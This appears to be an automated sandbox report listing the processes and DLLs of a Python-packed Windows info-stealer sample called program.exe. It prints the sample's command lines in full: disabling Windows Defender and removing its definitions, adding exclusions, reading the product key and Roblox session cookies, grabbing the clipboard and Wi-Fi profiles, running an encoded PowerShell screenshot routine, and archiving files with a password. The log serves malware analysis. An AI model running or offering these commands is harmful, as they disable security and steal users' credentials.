              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Users\user\Desktop\program.exe "C:\Users\user\Desktop\program.exe"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\program.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\MBLSI.zip" *"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\program.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tgmup5d5\tgmup5d5.cmdline"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES93BE.tmp" "c:\Users\user\AppData\Local\Temp\tgmup5d5\CSC93ACBC84BC674220B3501D9F22ECFDE.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\MBLSI.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\program.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\program.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\program.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Users\user\Desktop\program.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\program.exeSection loaded: python3.dllJump to behavior
              Source: C:\Users\user\Desktop\program.exeSection loaded: libffi-8.dllJump to behavior
              Source: C:\Users\user\Desktop\program.exeSection loaded: sqlite3.dllJump to behavior
              Source: C:\Users\user\Desktop\program.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\program.exeSection loaded: libcrypto-3.dllJump to behavior
              Source: C:\Users\user\Desktop\program.exeSection loaded: libssl-3.dllJump to behavior
              Source: C:\Users\user\Desktop\program.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\program.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\program.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\program.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\program.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\program.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\program.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Users\user\Desktop\program.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Users\user\Desktop\program.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\program.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\program.exeSection loaded: dciman32.dllJump to behavior
              Source: C:\Users\user\Desktop\program.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\Desktop\program.exeSection loaded: mmdevapi.dllJump to behavior
              Source: C:\Users\user\Desktop\program.exeSection loaded: devobj.dllJump to behavior
              Source: C:\Users\user\Desktop\program.exeSection loaded: ksuser.dllJump to behavior
              Source: C:\Users\user\Desktop\program.exeSection loaded: avrt.dllJump to behavior
              Source: C:\Users\user\Desktop\program.exeSection loaded: audioses.dllJump to behavior
              Source: C:\Users\user\Desktop\program.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Users\user\Desktop\program.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Users\user\Desktop\program.exeSection loaded: msacm32.dllJump to behavior
              Source: C:\Users\user\Desktop\program.exeSection loaded: midimap.dllJump to behavior
              Source: C:\Users\user\Desktop\program.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\program.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\program.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
